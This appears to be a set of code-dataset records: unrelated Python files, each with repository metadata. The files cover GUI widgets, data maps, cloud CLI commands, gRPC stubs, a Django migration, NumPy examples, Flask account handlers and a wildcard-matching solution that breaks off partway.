null
UTF-8
Python
false
false
636
py
from system.gui.widgets.factory import create_widget class RemoveExperimentView: def __init__(self, root_view): self.window = create_widget('toplevel', master=root_view.root, title='Remove Experiment') self.widget = {} self.widget['experiment_name'] = create_widget('labeled_combobox', master=self.window, row=0, column=0, columnspan=2, text='Experiment name', required=True) self.widget['remove'] = create_widget('button', master=self.window, row=1, column=0, text='Remove') self.widget['cancel'] = create_widget('button', master=self.window, row=1, column=1, text='Cancel')
[ "yunsheng@mit.edu" ]
yunsheng@mit.edu
9a38399c9e91b0b590e07ffec154c506173b08a7
e526543920e4974504cb62802c393d5bc46559db
/female-labor-force/female_labor_force.py
8661eaf2f43beec409de2f01b78fb6af53fc144d
[]
no_license
mare-astrorum/python-crash-course-practice
b843f2067208b749558c4423556498e643c5fa42
47423808902b75af9d7888d4f9fa9f083bce88f4
refs/heads/master
2020-09-06T19:02:09.837740
2019-11-08T17:30:52
2019-11-08T17:30:52
220,516,919
0
0
null
null
null
null
UTF-8
Python
false
false
1,775
py
import csv from pygal_maps_world.maps import World from country_codes import get_country_code # Load the data. filename = 'data/female_labor_force.csv' with open(filename) as f: reader = csv.reader(f) # Find the header row. for i, row in enumerate(reader): if i == 4: header_row = row # Create the dictionary containing country code and percentage of women # in labor force. cc_pop = {} for row in reader: # Eliminate the empty rows. if row: # Find population in 2016. population = row[61] # Eliminate empty values. if population != '': population = int(float(population)) country_name = row[0] country_code = get_country_code(country_name) if country_code: cc_pop[country_code] = population # Group the countries into 3 percentage levels. cc_pop_1, cc_pop_2, cc_pop_3 = {}, {}, {} for cc, pop in cc_pop.items(): if pop < 30: cc_pop_1[cc] = pop elif pop < 45: cc_pop_2[cc] = pop else: cc_pop_3[cc] = pop # See how many countries are in each group. print(len(cc_pop_1), len(cc_pop_2), len(cc_pop_3)) # Create the map. wm = World() wm.title = 'Female Labor Force in 2016, %' wm.add('<30%', cc_pop_1) wm.add('30-45%', cc_pop_2) wm.add('>45%', cc_pop_3) wm.render_to_file('female_labor_force.svg')
[ "a@a.com" ]
a@a.com
967ce7d0a562a19af62f740ed144332b93de848f
89055b2f91fb608806d4cb92754ee51f9fd7b436
/sign_up_students_first_version/signup_stats.py
0c99c7abfe71c556a5e98605529d69cc7cf6a7f1
[]
no_license
rosedu/web-workshops
52c778242e62dd7dbf8e629ab5fc8424e86a63f4
28ff91dca7f84a4a58f2ece6b94f28403e667776
refs/heads/webdev-landing
2023-05-11T06:38:48.370896
2023-05-03T16:47:58
2023-05-03T16:47:58
2,889,807
2
0
null
2023-05-03T16:47:59
2011-12-01T08:53:18
HTML
UTF-8
Python
false
false
1,222
py
import sys from collections import defaultdict import yaml mail_blacklist = ['google@gigibecali.ro'] def main(): count = defaultdict(int) for document in list(yaml.load_all(sys.stdin))[5:-1]: if document['email'] in mail_blacklist: continue count['_total'] += 1 value_sunt = document['sunt'] count['sunt', value_sunt] += 1 if value_sunt == 'student': facultate = document['student-facultate'] if ('automatica' in facultate.lower() or 'calculatoare' in facultate.lower()): facultate = 'ACS' an = document.get('student-an') if an == 'I': an = '1' if an == 'II': an = '2' if an == 'III': an = '3' if an and an[0] == '3': an = '3' count['sunt-student', facultate, an] += 1 for name in document['topic-stiu']: count['stiu', name] += 1 for name in document['topic-vreau']: count['vreau', name] += 1 from pprint import pprint pprint(dict(count)) if __name__ == '__main__': main()
[ "alex@grep.ro" ]
alex@grep.ro
e037b4c7567e546162b66093e9500d87196bea8f
70fa6468c768d4ec9b4b14fc94fa785da557f1b5
/lib/surface/compute/target_http_proxies/list.py
e0e69989cde89c8fa89a984c02884926d50f4f55
[ "LicenseRef-scancode-unknown-license-reference", "Apache-2.0" ]
permissive
kylewuolle/google-cloud-sdk
d43286ef646aec053ecd7eb58566ab2075e04e76
75f09ebe779e99fdc3fd13b48621fe12bfaa11aa
refs/heads/master
2020-04-20T22:10:41.774132
2019-01-26T09:29:26
2019-01-26T09:29:26
169,131,028
0
0
NOASSERTION
2019-02-04T19:04:40
2019-02-04T18:58:36
Python
UTF-8
Python
false
false
2,877
py
# -*- coding: utf-8 -*- # # Copyright 2014 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Command for listing target HTTP proxies.""" from __future__ import absolute_import from __future__ import division from __future__ import unicode_literals from googlecloudsdk.api_lib.compute import base_classes from googlecloudsdk.api_lib.compute import lister from googlecloudsdk.calliope import base from googlecloudsdk.command_lib.compute.target_http_proxies import flags @base.ReleaseTracks(base.ReleaseTrack.GA, base.ReleaseTrack.BETA) class List(base.ListCommand): """List target HTTP proxies.""" @staticmethod def Args(parser): parser.display_info.AddFormat(flags.DEFAULT_LIST_FORMAT) lister.AddBaseListerArgs(parser) parser.display_info.AddCacheUpdater(flags.TargetHttpProxiesCompleter) def Run(self, args): holder = base_classes.ComputeApiHolder(self.ReleaseTrack()) client = holder.client request_data = lister.ParseNamesAndRegexpFlags(args, holder.resources) list_implementation = lister.GlobalLister( client, client.apitools_client.targetHttpProxies) return lister.Invoke(request_data, list_implementation) List.detailed_help = base_classes.GetGlobalListerHelp('target HTTP proxies') @base.ReleaseTracks(base.ReleaseTrack.ALPHA) class ListAlpha(base.ListCommand): """List Target HTTP Proxies..""" @classmethod def Args(cls, parser): parser.display_info.AddFormat(flags.DEFAULT_LIST_FORMAT) lister.AddMultiScopeListerFlags(parser, regional=True, global_=True) parser.display_info.AddCacheUpdater(flags.TargetHttpProxiesCompleterAlpha) def Run(self, args): holder = base_classes.ComputeApiHolder(self.ReleaseTrack()) client = holder.client request_data = lister.ParseMultiScopeFlags(args, holder.resources) list_implementation = lister.MultiScopeLister( client, regional_service=client.apitools_client.regionTargetHttpProxies, global_service=client.apitools_client.targetHttpProxies, aggregation_service=client.apitools_client.targetHttpProxies) return lister.Invoke(request_data, list_implementation) ListAlpha.detailed_help = base_classes.GetMultiScopeListerHelp( 'target HTTP proxies', scopes=[ base_classes.ScopeType.global_scope, base_classes.ScopeType.regional_scope ])
[ "cloudsdk.mirror@gmail.com" ]
cloudsdk.mirror@gmail.com
8ee1e63fa12d87ff629257f88095d3dd0647cd17
92874c7364a5c7f026fbff1f06d3100280438724
/pelicanconf.py
54517ea5a124a86cd208cd1e99324be8e4b4bbcc
[]
no_license
quintusdias/quintusdias.github.io-src
0c3e9d4d17def5a8761f0a1636d52c1147c9288f
1dd2b3143abcc38d88d0f056e5023251c615ba36
refs/heads/master
2021-01-21T11:16:15.017329
2017-03-04T12:50:16
2017-03-04T12:50:16
83,545,468
0
0
null
null
null
null
UTF-8
Python
false
false
909
py
# -*- coding: utf-8 -*- # from __future__ import unicode_literals AUTHOR = 'John Evans' SITENAME = 'https://quintusdias.github.io' SITEURL = 'https://quintusdias.github.io' PATH = 'content' TIMEZONE = 'America/New_York' DEFAULT_LANG = 'en' DEFAULT_DATE = 'fs' # Feed generation is usually not desired when developing FEED_ALL_ATOM = None CATEGORY_FEED_ATOM = None TRANSLATION_FEED_ATOM = None AUTHOR_FEED_ATOM = None AUTHOR_FEED_RSS = None # Blogroll LINKS = (('Pelican', 'http://getpelican.com/'), ('Python.org', 'http://python.org/'), ('Jinja2', 'http://jinja.pocoo.org/'), ('You can modify those links in your config file', '#'),) # Social widget SOCIAL = (('You can add links in your config file', '#'), ('Another social link', '#'),) DEFAULT_PAGINATION = 10 # Uncomment following line if you want document-relative URLs when developing #RELATIVE_URLS = True
[ "john.g.evans.ne@gmail.com" ]
john.g.evans.ne@gmail.com
0a360c6b7f3a6caf3da4bcdc61eee7acace23b5c
75d04e22b2688bc0b2c0a8dd14a4336eeb4be3bd
/distribute_data.py
69002acf95b7fa55d644aaa6f411974aa0a92fb3
[]
no_license
vbvg2008/CAPSNET
2cae7580b5e5ded96bceb67f80083f2f06654e08
5d069f7fbd8c42e2f24807f7740a97682172c254
refs/heads/master
2020-03-06T20:04:47.583855
2018-04-27T20:15:30
2018-04-27T20:15:30
127,044,254
0
0
null
null
null
null
UTF-8
Python
false
false
1,710
py
import os from shutil import copyfile original_root = '/home/jenno/Desktop/core50_128x128/' train_root = '/home/jenno/Desktop/core50_static/train' test_root = '/home/jenno/Desktop/core50_static/test' train_session = ['s1','s2','s4','s5'] test_session = ['s3','s6'] #now begin copy training data for s_current in train_session: print(s_current) session_folder = os.path.join(original_root,s_current) object_list = os.listdir(session_folder) for o_current in object_list: object_folder = os.path.join(session_folder,o_current) image_list = os.listdir(object_folder) #check if the object folder exists in training destination_root = os.path.join(train_root,o_current) if os.path.isdir(destination_root) is False: os.mkdir(destination_root) for image in image_list: src = os.path.join(object_folder,image) dst = os.path.join(destination_root,image) copyfile(src,dst) #now begin copy testing data for s_current in test_session: print(s_current) session_folder = os.path.join(original_root,s_current) object_list = os.listdir(session_folder) for o_current in object_list: object_folder = os.path.join(session_folder,o_current) image_list = os.listdir(object_folder) #check if the object folder exists in training destination_root = os.path.join(test_root,o_current) if os.path.isdir(destination_root) is False: os.mkdir(destination_root) for image in image_list: src = os.path.join(object_folder,image) dst = os.path.join(destination_root,image) copyfile(src,dst)
[ "shawnmengdong@gmail.com" ]
shawnmengdong@gmail.com
0f04671661041f0b708c2620229f78f0c46f83c2
4d66af0a7c2cbcfae37fa12f650ccc2accf2708b
/NPAF_pb2_grpc.py
1266fb26145d2dccfccf06644f48145b69d4b02d
[]
no_license
Tiffanyyor23/gRPC
804a38bcce2c509feffee101b998385d529fad80
18c06a9cb14eae7e8a673fce5aad7811c7821c3a
refs/heads/master
2023-08-01T09:42:44.731850
2021-09-16T04:10:43
2021-09-16T04:10:43
407,016,166
0
0
null
null
null
null
UTF-8
Python
false
false
2,372
py
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT! """Client and server classes corresponding to protobuf-defined services.""" import grpc import NPAF_pb2 as NPAF__pb2 class RouteDataStub(object): """Missing associated documentation comment in .proto file.""" def __init__(self, channel): """Constructor. Args: channel: A grpc.Channel. """ self.CollectRoutes = channel.unary_unary( '/RouteData/CollectRoutes', request_serializer=NPAF__pb2.RouteRequest.SerializeToString, response_deserializer=NPAF__pb2.DeviceRoutes.FromString, ) class RouteDataServicer(object): """Missing associated documentation comment in .proto file.""" def CollectRoutes(self, request, context): """Missing associated documentation comment in .proto file.""" context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!') def add_RouteDataServicer_to_server(servicer, server): rpc_method_handlers = { 'CollectRoutes': grpc.unary_unary_rpc_method_handler( servicer.CollectRoutes, request_deserializer=NPAF__pb2.RouteRequest.FromString, response_serializer=NPAF__pb2.DeviceRoutes.SerializeToString, ), } generic_handler = grpc.method_handlers_generic_handler( 'RouteData', rpc_method_handlers) server.add_generic_rpc_handlers((generic_handler,)) # This class is part of an EXPERIMENTAL API. class RouteData(object): """Missing associated documentation comment in .proto file.""" @staticmethod def CollectRoutes(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None): return grpc.experimental.unary_unary(request, target, '/RouteData/CollectRoutes', NPAF__pb2.RouteRequest.SerializeToString, NPAF__pb2.DeviceRoutes.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
[ "root@localhost.localdomain" ]
root@localhost.localdomain
40876e5aad4716d60a85e698a8107b820be76212
2f19adddc875673df742475c1c97b5aca720cac7
/venv/Lib/site-packages/pygame/examples/audiocapture.py
a5688898e35d724f0f1d1a57201e42275c36d548
[]
no_license
rosepcaldas/Cursoemvideo
4e71b1ce0fe6e5c2ac83a15ff9e18768778d1dab
c722b1f7f902e43168279cd4e0414215b8395dc6
refs/heads/master
2020-07-28T20:19:46.004918
2019-09-19T10:24:31
2019-09-19T10:24:31
209,524,974
0
0
null
null
null
null
UTF-8
Python
false
false
1,276
py
import time import pygame as pg if pg.get_sdl_version()[0] < 2: raise SystemExit('This example requires pygame 2 and SDL2.') from pygame._sdl2 import ( get_audio_device_name, get_num_audio_devices, AudioDevice, AUDIO_F32, AUDIO_ALLOW_FORMAT_CHANGE ) pg.mixer.pre_init(44100, 32, 2, 512) pg.init() # init_subsystem(INIT_AUDIO) names = [get_audio_device_name(x, 1) for x in range(get_num_audio_devices(1))] print(names) iscapture = 1 sounds = [] sound_chunks = [] def callback(audiodevice, audiomemoryview): """ This is called in the sound thread. Note, that the frequency and such you request may not be what you get. """ # print(type(audiomemoryview), len(audiomemoryview)) # print(audiodevice) sound_chunks.append(bytes(audiomemoryview)) audio = AudioDevice( devicename=names[0], iscapture=1, frequency=44100, audioformat=AUDIO_F32, numchannels=2, chunksize=512, allowed_changes=AUDIO_ALLOW_FORMAT_CHANGE, callback=callback, ) # start recording. audio.pause(0) print('recording with :%s:' % names[0]) time.sleep(5) print('Turning data into a pygame.mixer.Sound') sound = pg.mixer.Sound(buffer=b''.join(sound_chunks)) print('playing back recorded sound') sound.play() time.sleep(5)
[ "rosepcaldas@gmail.com" ]
rosepcaldas@gmail.com
3f17b54387be42dfd49e4162f5fb2bc7f40790a5
f046ecf6ec2bdc41e7bbd7012ec6d46846644af3
/carzone/cars/migrations/0001_initial.py
c085282e607a7fee584eb908c0995f3aa2ba1644
[]
no_license
varunjha18/carzone_project_updated
9f08e5b47cc6dc3d00c003797e8bc667737eb330
5853f8c569eac6c05cfe41b1a957586b1c83d48b
refs/heads/main
2023-04-28T10:59:27.598746
2021-05-26T12:55:36
2021-05-26T12:55:36
369,875,618
0
0
null
null
null
null
UTF-8
Python
false
false
3,950
py
# Generated by Django 3.1.1 on 2021-05-22 13:46 from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Car', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('city', models.CharField(max_length=200)), ('state', models.CharField(choices=[('AL', 'Alabama'), ('AK', 'Alaska'), ('AZ', 'Arizona'), ('AR', 'Arkansas'), ('CA', 'California'), ('CO', 'Colorado'), ('CT', 'Connecticut'), ('DE', 'Delaware'), ('DC', 'District Of Columbia'), ('FL', 'Florida'), ('GA', 'Georgia'), ('HI', 'Hawaii'), ('ID', 'Idaho'), ('IL', 'Illinois'), ('IN', 'Indiana'), ('IA', 'Iowa'), ('KS', 'Kansas'), ('KY', 'Kentucky'), ('LA', 'Louisiana'), ('ME', 'Maine'), ('MD', 'Maryland'), ('MA', 'Massachusetts'), ('MI', 'Michigan'), ('MN', 'Minnesota'), ('MS', 'Mississippi'), ('MO', 'Missouri'), ('MT', 'Montana'), ('NE', 'Nebraska'), ('NV', 'Nevada'), ('NH', 'New Hampshire'), ('NJ', 'New Jersey'), ('NM', 'New Mexico'), ('NY', 'New York'), ('NC', 'North Carolina'), ('ND', 'North Dakota'), ('OH', 'Ohio'), ('OK', 'Oklahoma'), ('OR', 'Oregon'), ('PA', 'Pennsylvania'), ('RI', 'Rhode Island'), ('SC', 'South Carolina'), ('SD', 'South Dakota'), ('TN', 'Tennessee'), ('TX', 'Texas'), ('UT', 'Utah'), ('VT', 'Vermont'), ('VA', 'Virginia'), ('WA', 'Washington'), ('WV', 'West Virginia'), ('WI', 'Wisconsin'), ('WY', 'Wyoming')], max_length=200)), ('car_title', models.CharField(max_length=200)), ('color', models.CharField(max_length=100)), ('model', models.CharField(max_length=100)), ('year', models.CharField(max_length=100)), ('condition', models.CharField(max_length=100)), ('price', models.IntegerField()), ('description', models.TextField(max_length=600)), ('car_photo', models.ImageField(upload_to='photos/%y/%m/%d/')), ('car_photo_1', models.ImageField(blank=True, upload_to='photos/%y/%m/%d/')), ('car_photo_2', models.ImageField(blank=True, upload_to='photos/%y/%m/%d/')), ('car_photo_3', models.ImageField(blank=True, upload_to='photos/%y/%m/%d/')), ('car_photo_4', models.ImageField(blank=True, upload_to='photos/%y/%m/%d/')), ('features', models.CharField(choices=[('Cruise Control', 'Cruise Control'), ('Audio Interface', 'Audio Interface'), ('Airbags', 'Airbags'), ('Air Conditioning', 'Air Conditioning'), ('Seat Heating', 'Seat Heating'), ('Alarm System', 'Alarm System'), ('ParkAssist', 'ParkAssist'), ('Power Steering', 'Power Steering'), ('Reversing Camera', 'Reversing Camera'), ('Direct Fuel Injection', 'Direct Fuel Injection'), ('Auto Start/Stop', 'Auto Start/Stop'), ('Wind Deflector', 'Wind Deflector'), ('Bluetooth Handset', 'Bluetooth Handset')], max_length=100)), ('body_style', models.CharField(max_length=100)), ('engine', models.CharField(max_length=100)), ('transmission', models.CharField(max_length=100)), ('interiors', models.CharField(max_length=100)), ('miles', models.IntegerField()), ('doors', models.CharField(choices=[('2', '2'), ('3', '3'), ('4', '4'), ('5', '5'), ('6', '6')], max_length=100)), ('passengers', models.IntegerField()), ('vin_no', models.CharField(max_length=100)), ('milage', models.IntegerField()), ('fuel_type', models.CharField(max_length=100)), ('no_of_owners', models.CharField(max_length=100)), ('is_featured', models.BooleanField(default=False)), ('created_date', models.DateTimeField(auto_now_add=True)), ], ), ]
[ "varunjha2000@gmail.com" ]
varunjha2000@gmail.com
fe123e0751e952b397db20f1c47b285ee1f6d27b
f569978afb27e72bf6a88438aa622b8c50cbc61b
/douyin_open/ShareIdShareId/__init__.py
b05b76dadef0b38f532e88c1a0b30e636ba79cb3
[]
no_license
strangebank/swagger-petstore-perl
4834409d6225b8a09b8195128d74a9b10ef1484a
49dfc229e2e897cdb15cbf969121713162154f28
refs/heads/master
2023-01-05T10:21:33.518937
2020-11-05T04:33:16
2020-11-05T04:33:16
310,189,316
1
0
null
null
null
null
UTF-8
Python
false
false
966
py
# coding: utf-8 # flake8: noqa """ No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501 OpenAPI spec version: 1.0.0 Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import # import apis into sdk package from douyin_open.ShareIdShareId.api.share_id_api import ShareIdApi # import ApiClient from douyin_open.ShareIdShareId.api_client import ApiClient from douyin_open.ShareIdShareId.configuration import Configuration # import models into sdk package from douyin_open.ShareIdShareId.models.description import Description from douyin_open.ShareIdShareId.models.error_code import ErrorCode from douyin_open.ShareIdShareId.models.extra_body import ExtraBody from douyin_open.ShareIdShareId.models.inline_response200 import InlineResponse200 from douyin_open.ShareIdShareId.models.inline_response200_data import InlineResponse200Data
[ "strangebank@gmail.com" ]
strangebank@gmail.com
4a0beee1ac136b3e523feffcfa1e9a36ce6d967f
9c58a1f594e18cee20128f2c8dad8257429b10d1
/custom_business_reports/wizard/sales_per_product.py
495d5e1113521f969a5ae62178d4d361b1ebd2c6
[]
no_license
gastonfeng/Odoo-eBay-Amazon
e8919768b2a1500209f209ee3aecc7f2fb10cda7
a9c4a8a7548b19027bc0fd904f8ae9249248a293
refs/heads/master
2022-04-05T00:23:50.483430
2020-02-19T04:58:56
2020-02-19T04:58:56
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,007
py
# -*- coding: utf-8 -*- from datetime import datetime, timedelta from pytz import timezone import pytz from odoo import models, fields, api class SalesPerProduct(models.TransientModel): _name = 'sales.per.product.wizard' period_start = fields.Date('Period start', help="Date when the current period starts, sales will be counted one day/week/month to the past and to the future of this date", default = datetime.now() + timedelta(weeks=-1), required = True) grouping_criteria = fields.Selection([('day', 'Day'), ('week', 'Week'), ('month', 'Month')], 'Grouping criteria', required=True, default='week') drop_percentage = fields.Integer(required=True, help="This report shows LADs where the sales drop percentage is higher than this percentage", default=0) @api.multi def button_download_report(self): return { 'type': 'ir.actions.act_url', 'url': '/reports/sales_per_product?id=%s' % (self.id), 'target': 'new', }
[ "yjm@mail.ru" ]
yjm@mail.ru
ab83b4c18b59a01c63603528d3559e0f3d384862
cd5746f8cc7aee1f20606a65b4fae0d5e8ee78dc
/Python Books/Mastering-Machine-Learning-scikit-learn/NumPy-Beginner/CODE/Chapter2/shapemanipulation.py
b1649ea9beac68249de1ddd6e164eba87ed89124
[]
no_license
theGreenJedi/Path
df24fca355590efef0c6cb5c52e7216c6b5d2464
b5ed2805dbb046480929e49e550bfd8af5bb4d6f
refs/heads/master
2023-07-27T14:23:37.694546
2021-07-16T01:38:55
2021-07-16T01:38:55
87,686,563
8
2
null
2023-07-11T22:49:03
2017-04-09T05:57:30
Jupyter Notebook
UTF-8
Python
false
false
1,451
py
from __future__ import print_function import numpy as np # Chapter 2 Beginning with NumPy fundamentals # # Demonstrates multi dimensional arrays slicing. # # Run from the commandline with # # python shapemanipulation.py print("In: b = arange(24).reshape(2,3,4)") b = np.arange(24).reshape(2,3,4) print("In: b") print(b) #Out: #array([[[ 0, 1, 2, 3], # [ 4, 5, 6, 7], # [ 8, 9, 10, 11]], # # [[12, 13, 14, 15], # [16, 17, 18, 19], # [20, 21, 22, 23]]]) print("In: b.ravel()") print(b.ravel()) #Out: #array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, # 17, 18, 19, 20, 21, 22, 23]) print("In: b.flatten()") print(b.flatten()) #Out: #array([ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, # 17, 18, 19, 20, 21, 22, 23]) print("In: b.shape = (6,4)") b.shape = (6,4) print("In: b") print(b) #Out: #array([[ 0, 1, 2, 3], # [ 4, 5, 6, 7], # [ 8, 9, 10, 11], # [12, 13, 14, 15], # [16, 17, 18, 19], # [20, 21, 22, 23]]) print("In: b.transpose()") print(b.transpose()) #Out: #array([[ 0, 4, 8, 12, 16, 20], # [ 1, 5, 9, 13, 17, 21], # [ 2, 6, 10, 14, 18, 22], # [ 3, 7, 11, 15, 19, 23]]) print("In: b.resize((2,12))") b.resize((2,12)) print("In: b") print(b) #Out: #array([[ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11], # [12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23]])
[ "GreenJedi@protonmail.com" ]
GreenJedi@protonmail.com
8db48489893a0ddd39db9dc8bd3cba251c0a46ba
9743d5fd24822f79c156ad112229e25adb9ed6f6
/xai/brain/wordbase/nouns/_determinations.py
19cd727e8dba49b7d873037177329135ce8d5944
[ "MIT" ]
permissive
cash2one/xai
de7adad1758f50dd6786bf0111e71a903f039b64
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
refs/heads/master
2021-01-19T12:33:54.964379
2017-01-28T02:00:50
2017-01-28T02:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
287
py
from xai.brain.wordbase.nouns._determination import _DETERMINATION #calss header class _DETERMINATIONS(_DETERMINATION, ): def __init__(self,): _DETERMINATION.__init__(self) self.name = "DETERMINATIONS" self.specie = 'nouns' self.basic = "determination" self.jsondata = {}
[ "xingwang1991@gmail.com" ]
xingwang1991@gmail.com
83c9ee9ea54b7d98e295f2b62de4a2bc7770d39d
a6cea8d1455f4927126b848c8598310a9242ab86
/Handlers/Account.py
53bd377011f4f62cef75ae4977af6e7d137b55db
[]
no_license
martin-woolstenhulme/sendwithfriends
35b4410bda49fbfdfaf8920311e217db6758d2cf
2daa32553dbace291c950ccd6de1bc5107ef50f7
refs/heads/master
2020-06-08T19:41:36.802905
2014-09-07T09:13:13
2014-09-07T09:13:13
23,756,328
0
1
null
null
null
null
UTF-8
Python
false
false
1,823
py
from flask import make_response from flask import render_template, request, url_for, redirect, session, flash from db_schema.db_functions import * import json from flask import jsonify import logging def signup_account(): data = request.json print data # retrieve information password = data.get('password') email = data.get('email') userid = addUserAccount('', '', email, '') mm={'error':None, 'status':'ok'} mm['next_url'] = '/profile' if mm['error'] is not None: mm['status'] = 'error' mm['userid'] = userid resp = make_response(jsonify(mm)) resp.headers['Content-Type'] = "application/json" return resp def update_account(): data = request.json print data token = data.get('token') provider = 'braintree' userid = read_cookie() # retrieve information name = data.get('name').split() firstname = name[0] lastname = name[1] phone = data.get('tel') user = getUser(userid) email = user[2] userid = updateUserAccount(userid, firstname, lastname, email, phone) addPayment(userid, token, provider) mm={'error':None, 'status':'ok'} mm['next_url'] = '/add_contact' if mm['error'] is not None: mm['status'] = 'error' resp = make_response(jsonify(mm)) resp.headers['Content-Type'] = "application/json" return resp def update_contacts(): data = request.json print data emails = data.get('emails') userid = read_cookie() for e in emails: addFriendByEmail(userid, e) mm={'error':None, 'status':'ok'} mm['next_url'] = '/send_money' resp = make_response(jsonify(mm)) resp.headers['Content-Type'] = "application/json" return resp def read_cookie(): return request.cookies.get('userid')
[ "elaine.ou@gmail.com" ]
elaine.ou@gmail.com
4c93cf5084fb9a5d19b1bb301af8711a8767007c
75169b83f2b975bff8baf61f0cf1264cf4b71a28
/worker/Reversion/model/alert.py
5d39269c05c0207078a50efc165d26a768c682bb
[]
no_license
Pangpang2/Python
a27024587ae51923954deefaaff304a26e5a944f
0b3bcfbdcaa71253c798090713c052fd397bff3f
refs/heads/master
2022-12-01T10:03:23.214443
2020-08-26T00:21:15
2020-08-26T00:21:15
290,171,195
0
0
null
null
null
null
UTF-8
Python
false
false
268
py
class Alert(object): def __init__(self): self.id = '' self.description = '' def to_dictionary(self): alert_dict = {} alert_dict['id'] = self.id alert_dict['description'] = self.description return alert_dict
[ "may.li@internetbrands.com" ]
may.li@internetbrands.com
9d831a96d6db798d73e1650111af5d03adeab6f4
89260668655a46278e8f22a5807b1f640fd1490c
/mySite/records/migrations/0014_auto_20170529_0026.py
0f52f66b638d5bcb22cd6f408f1e76344fa3d40d
[]
no_license
happychallenge/mySite
926136859c5b49b7fd8baff09b26f375b425ab30
ddbda42d5d3b9c380a594d81a27875b4ad10358b
refs/heads/master
2020-12-30T13:28:31.018611
2017-11-08T02:52:18
2017-11-08T02:52:18
91,218,922
0
0
null
null
null
null
UTF-8
Python
false
false
1,759
py
# -*- coding: utf-8 -*- # Generated by Django 1.11 on 2017-05-29 00:26 from __future__ import unicode_literals from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('records', '0013_auto_20170525_2329'), ] operations = [ migrations.CreateModel( name='Evidence', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created_at', models.DateTimeField(auto_now_add=True)), ('created_user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ('news', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='records.News')), ('personevent', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='records.PersonEvent')), ], ), migrations.AlterUniqueTogether( name='eventnews', unique_together=set([]), ), migrations.RemoveField( model_name='eventnews', name='created_user', ), migrations.RemoveField( model_name='eventnews', name='event', ), migrations.RemoveField( model_name='eventnews', name='news', ), migrations.DeleteModel( name='EventNews', ), migrations.AlterUniqueTogether( name='evidence', unique_together=set([('personevent', 'news')]), ), ]
[ "happychallenge@outlook.com" ]
happychallenge@outlook.com
0805fbf1572f603152c9f49194310966efe9515c
846906de1e1ce1579ed8c0bc6ba3454f87791856
/NetworkBehaviour/Logic/TensorflowModules/TensorflowBehaviour.py
262439e6a4403a4cd3f4d29f39b56674682f1f88
[]
no_license
abahmer/PymoNNto
48d1a53d660c6da7f45048e61f6bd8954f24ecaf
17e117c971c1faa44205a69fc095a392aa7a7b9a
refs/heads/master
2023-03-21T07:40:42.336567
2021-03-08T12:28:46
2021-03-08T12:28:46
null
0
0
null
null
null
null
UTF-8
Python
false
false
324
py
from PymoNNto.NetworkCore.Behaviour import * import numpy as np import os os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' import tensorflow as tf class TensorflowBehaviour(Behaviour): def set_variables(self, neurons): if not hasattr(neurons, 'tf'): neurons.tf = tf super().set_variables(neurons)
[ "mv15go@gmail.com" ]
mv15go@gmail.com
e2eb4050d6367ccba352643e8999a26590f0a3d0
453ca12d912f6498720152342085636ba00c28a1
/leetcode/backtracking/python/wildcard_matching_leetcode.py
67c7f721cab4c6eab9cd03006a6c461377f9bfb3
[]
no_license
yanbinkang/problem-bank
f9aa65d83a32b830754a353b6de0bb7861a37ec0
bf9cdf9ec680c9cdca1357a978c3097d19e634ae
refs/heads/master
2020-06-28T03:36:49.401092
2019-05-20T15:13:48
2019-05-20T15:13:48
null
0
0
null
null
null
null
UTF-8
Python
false
false
4,976
py
""" https://leetcode.com/problems/wildcard-matching/ Implement wildcard pattern matching with support for '?' and '*'. '?' Matches any single character. '*' Matches any sequence of characters (including the empty sequence). The matching should cover the entire input string (not partial). The function prototype should be: bool isMatch(const char *s, const char *p) Some examples: isMatch("aa","a") => false isMatch("aa","aa") => true isMatch("aaa","aa") => false isMatch("aa", "*") => true isMatch("aa", "a*") => true isMatch("ab", "?*") => true isMatch("aab", "c*a*b") => false """ """ ref: https://longwayjade.wordpress.com/2015/04/26/leetcode-recursion-dp-greedy-wildcard-matching/ O(p * s) where p and s are the lengths of the pattern and input strings. """ def is_match_2(s, p): i, j = 0, 0 asterick, match = -1, -1 """ asterick: once we found a star, we want to record the place of the star match: once we found a star, we want to start to match the rest of the pattern with the string, starting from the match position. This is for remembering the place where we need to start """ # we check and match every char in s while i < len(s): # we are not currently at '*'. s and p match or p == '?' if j < len(p) and (s[i] == p[j] or p[j] == '?'): i += 1 j += 1 # we are currently at a '*' elif j < len(p) and p[j] == '*': match = i asterick = j j += 1 # they do not match, we are not currently at '*' but the last match is '*' elif asterick >= 0: match += 1 i = match j = asterick + 1 # they do not match, we are not at '*' and last matched is not a '*', then the answer is 